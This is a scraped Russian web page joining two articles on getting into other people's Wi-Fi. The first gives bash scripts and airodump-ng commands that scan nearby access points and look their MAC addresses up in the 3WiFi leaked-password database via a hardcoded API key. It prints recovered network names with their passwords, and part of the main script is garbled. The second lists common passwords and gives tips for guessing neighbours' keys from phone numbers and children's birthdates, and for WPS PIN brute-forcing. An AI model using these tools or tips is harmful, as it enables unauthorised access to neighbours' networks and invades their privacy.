Пароли от всех wi fi точек

HackWare.ru

Этичный хакинг и тестирование на проникновение, информационная безопасность

Как быстро узнать пароль от Wi-Fi рядом (без режима монитора)

После статьи «Как взломать Wi-Fi обычным адаптером без режима монитора» я подумал: чтобы ещё необычного можно сделать с обычной Wi-Fi картой?

У меня появилась парочка интересных идей и в этой заметке я поделюсь первой идеей. Есть сервис 3WiFi — он позволяет узнать пароли от точек доступа Wi-Fi. Подробности о самом сервисе в статье «Сервис 3WiFi: пароли от точек доступа Wi-Fi». Было бы неплохо что-нибудь такое придумать, чтобы автоматически проверять все точки в округе на наличие тех, которые есть в базе данных 3WiFi — чтобы не искать вручную, а просто сразу просканировать и подключиться. И… это уже тоже сделано — подробности в статье «Автоматическая проверка всех Точек Доступа по базе 3WiFi».

Но реализация WiFi-autopwner требует наличия двух беспроводных адаптеров, один из которых обязательно должен поддерживать режим монитора, а второй обязательно быть подключённым к Интернету.

В общем, я придумал способ, который позволяет проверить все беспроводные точки доступа в пределах досягаемости на их наличие в базе 3WiFi, но при этом требуется только одна Wi-Fi карта, причём обычная — её не нужно переводить в режим монитора. Правда, подключение Интернету по-прежнему требуется — поскольку используется онлайн база данных. Но что важно: во время сканирования, Wi-Fi соединение не будет разрываться. То есть достаточно 1 адаптера, который будет и сканировать, и в это же самое время быть подключённым к Интернету.

Попросту говоря, если у вас Linux с любой Wi-Fi картой, то вам этот способ уже подходит. Итак, рассмотрим способ как быстро узнать пароль от Wi-Fi рядом обычной Wi-Fi картой без режима монитора.

#!/bin/bash IFACE='wlan0' SCAN_ATTEMPTS=4 API_KEY='23ZRA8UBSLsdhbdJMp7IpbbsrDFDLuBC' TMP_FILE='/tmp/scan_results.txt' rm $TMP_FILE 2>/dev/null for (( i=1; i' )" echo "$FOUND" >> /tmp/scan_results.txt echo 'Found APs: ' `echo "$FOUND" | wc -l` done UNIQUE="$( cat $TMP_FILE | sort | uniq )" echo '===================' echo "Unique APs: "`echo "$UNIQUE" | wc -l` echo "$UNIQUE" | while read -r line ; do echo "Trying $line. "; echo -e "\033[0;32m`curl -s 'http://3wifi.stascorp.com/api/apiquery?key='$API_KEY'&bssid='$line`\e[0m" | grep -E -v ':\[\]'; sleep 15; done

Прежде чем запустить, нужно указать имя своего беспроводного интерфейса. Узнать это имя можно командой:

Вписать его нужно в строке (вместо wlan0):

Другие настройки — количество сканирований:

Читайте также:  Ar9285 virtual wifi miniport adapter

По умолчанию указано 4 — можете выбрать больше или меньше. Каждое сканирование занимает всего несколько секунд — чем больше сканирований, тем меньше вероятность пропустить беспроводные сети — особенно если вы перемещаете беспроводную карту в пределах комнаты.

Настройка API ключа сервиса 3WiFi:

API_KEY='23ZRA8UBSLsdhbdJMp7IpbbsrDFDLuBC'

Используется API ключ гостевого аккаунта — если у вас есть аккаунт более высокого уровня, то можете указать здесь свой ключ. Если такого аккаунта у вас нет — то не надо ничего менять в этой строке.

Если у вас не-гостевой аккаунт и вы прописали свой API ключ, то удалите из скрипта строку:

Если после строки, которая начинается с Trying … ничего не выведено, значит проверяемая ТД отсутствует в базе данных 3WiFi.

Если Точка Доступа найдена в 3WiFi, то будет выведено примерно следующее:

essid — это имя точки доступа, а key — это пароль от неё. То есть в предыдущей строке сказано, что для ТД BURAPA паролем для подключения к Wi-Fi является 0840446924.

Если возникла ошибка вида:

то она означает, что предыдущая ТД не проверена — вы можете позднее перезапустить сканирование, либо вручную проверить пропущенные ТД на сайте 3WiFi.

Две ТД не получилось проверить, зато найдена новая в БД:

Имя: walaiporn, пароль: 77291944.

Бонус

Рассмотрим ещё один вариант — когда Wi-Fi карта одна, но она поддерживает режим монитора. В этом случае можно просканировать сети с помощью airodump-ng — во время сканирование беспроводной адаптер должен быть в режиме монитора и, следовательно, не может быть подключён к Интернету. Поэтому данные сканирования, вместо проверки, можно сохранить в файл.

Затем, после окончания сканирования, можно подключиться к Интернету с помощью этого адаптера и выполнить проверку по онлайн базе данных.

Итак, переводим интерфейс в режим монитора (замените ИНТЕРФЕЙС на имя вашего беспроводного интерфейса):

sudo ip link set ИНТЕРФЕЙС down sudo iw ИНТЕРФЕЙС set monitor control sudo ip link set ИНТЕРФЕЙС up

И запускаем airodump-ng (укажите действительное имя интерфейса вместо ИНТЕРФЕЙС):

sudo airodump-ng --berlin 60000 -w /tmp/3wifi ИНТЕРФЕЙС

Работать программа может любое количество времени — на ваше усмотрение. Когда надоест собирать данные, нажмите CTRL+с.

Теперь создайте файл 3wifi-file.sh:

#!/bin/bash API_KEY='23ZRA8UBSLsdhbdJMp7IpbbsrDFDLuBC' FILE='/tmp/3wifi-01.csv' while read -r line ; do BSSID=`echo $line | awk '' | sed 's/,//'` ESSID=`echo $line | awk -F"," '' | sed 's/ //'` echo "Trying $BSSID $ESSID" echo -e "\033[0;32m`curl -s 'http://3wifi.stascorp.com/api/apiquery?key='$API_KEY'&bssid='$BSSID`\e[0m" | grep -E -v ':\[\]' sleep 15 done < <(grep -E '([A-Za-z0-9._: @\(\)\\=\[\<\>\"%;-]+,)' $FILE)

Когда у вас вновь будет подключение к Интернету, запустите его:

Дождитесь окончания работы.

Если вы собираетесь запускать airodump-ng ещё раз, то очистите файлы, которые были созданы ранее (иначе программа 3wifi-file.sh будет вновь использовать старые файлы):

Источник

Самые популярные пароли от Wi-Fi: список, рекомендации и дополнительная информация

WiFiGid

Прежде чем листать ниже и сразу пробовать «самые распространенные пароли Wi-Fi», которые я предоставлю в этой статье – я все же рекомендую прочесть, то что я напишу. В первую очередь нужно понимать, что не факт, что эти пароли вам подойдут. Дело в том, что на большинстве сайтах предоставляют топ-100, топ-30 или топ-1000 паролей, которые популярны во всем мире.

А теперь давайте подумаем, чем весь мир отличается от стран СНГ. Да тем, что большинство тех паролей пишут на английском, а в большинстве случаев наш простой люд его просто не знает. Следовательно, эти все топы почти бесполезны, так как они взяты с иностранных сайтов и если и подойдут, то с такой низкой вероятностью, что легче его просто взломать.

Именно поэтому дальше я не просто буду предоставлять ряд популярных паролей, но также буду давать некоторые советы по выуживанию паролей из самих клиентов. На самом деле статья была создана именно в целях увеличения компьютерной грамотности населения. Вы также можете писать в комментариях какой пароль подошел именно вам.

Ещё один важный момент – в самом конце я дам ссылки на полезные статьи по взлому или выуживанию паролей. Сразу скажу, что все они были написаны для будущих работников в безопасности IT сферы и их можно применять только в ознакомительных целях.

ПРИМЕЧАНИЕ! Если вам нужны словари для брута – то идём сюда.

Советы и пароли

На самом деле все популярные пароли WiFi до банальности простые и вы сами можете до них додуматься. При этом не нужно иметь топ-100 подобных ключей. Чаще всего настройкой вай-фай сетей занимаются работники компаний. Они также стараются выставлять простые пароли типа:

  1. Admin
  2. Admininstrator
  3. Qwerty
  4. Qwertyu
  5. Qwertyuiop[]
  6. Asdfghjkl;’
  7. Asdfg
  8. Zxcvb
  9. Zxcvbnm,./
  10. 1234567890-=
  11. 1234567890
  12. `1234567890-=
  13. 0000
  14. 1111111111
  15. 11111
  16. 2222222222
  17. 3333333333
  18. 4444444444
  19. 5555555555
  20. 6666666666
  21. 7777777777
  22. 8888888888
  23. 12341234
  24. 123412341234
  25. Qwerqwer
  26. qwerqwerqwer

Как видите все эти значения кроме первых двух, просто обычный проход по клавиатуре. Это нужно для того, чтобы пользователь не забыл данный ключь. Обычно ему просто показывают, как его ввести. Как правило мало, кто потом его меняет и их можно взломать. Есть ещё пару популярных Wi-Fi паролей, которые часто используется в России:

Очень часто также используется именно название городов. Например, «Moskva», при чем некоторые правильно пишут по-английски, но как правило большинство пишут транслитом. Также могут сюда добавляться номера регионов. Некоторые используют клички своих питомцев – правда тут нужно будет запариться с написание, так все пароли могу быть написаны только латинскими буквами.

А теперь мы подошли, наверное, к самому популярному, а именно использование в качестве ключей номера сотовых телефонов. Как не странно, но ломают такие пароли чаще всего вообще без каких-то тяжелых программ и переборов. Достаточно просто спросить номер телефона своего соседа и подключиться к беспроводной сети. Другие же идут чуть дальше и ставят в качестве ключей не свои телефоны, а номера любимых, родных, детей – например.

Далее идут – даты рождения. При чем некоторые устанавливают свою дату. Например, если в доме живет семья, то можно опробовать дату рождения всех членов семьи. Но некоторые идут чуть дальше и устанавливают даты рождения своих детей. Почти у половины семейных пар, с кем я знаком в качестве пароля стоит дата рождения первого ребенка – как правило он самый любимый. Так что если вас кто-то невзначай спрашивает о дате рождения вашего чада, то знайте – возможно вас в скором времени могут взломать.

Заход по WPS

Самое интересное, что почему-то никто не знает про данный метод. Суть в том, что на всех стандартных роутерах есть обычные восьмизначный PIN, которые состоит из 8 цифр. Он как раз и называется WPS. То есть какой бы сложный у вас не был пароль, вас могут ломануть по нему. Самый, наверное, простой способ – это зайти по-стандартному WPS. Поэтому советую посмотреть статью про Брутфорс. Там через Linux можно обычным перебором подключиться почти к любой сети с WPS.

Самые популярные пароли от Wi-Fi: список, рекомендации и дополнительная информация

Также есть и другие программы:

Где посмотреть стандартный пароль WPS и не только

Для этого есть мой любимый сервис «3 WiFi». Суть в том, что там предоставлены все инструменты, которые позволят вам зайти почти на все роутеры. В частности вы можете подсмотреть там стандартный WPS пароль вашего соседа, зная только MAK адрес устройства. Также там есть большой список паролей, который когда-то были взломаны. Их можно просматривать как в списке, так и на карте. Полную инструкцию по данному сервису я уже писал и с ней вы можете ознакомиться тут.

Самые популярные пароли от Wi-Fi: список, рекомендации и дополнительная информация

Взлом и безопасность

По данной теме я рекомендую статью от моего коллеги – переходим по ссылке. Там предоставлена вся техническая, а также теоретическая база, которая может помочь будущим «безопасникам». Сразу скажу и отвечу большинству читателей, что волшебной кнопки «взломать Wi-Fi» – не существует. И если вы все же хотите этим заняться и погрузиться в мир «безопасности IT», то начните с этой статьи. Дальше можете просмотреть наш раздел по взлому. Там предоставлено достаточно много статей и инструкций, которые могут помочь многим.

Источник

Оцените статью
Adblock
detector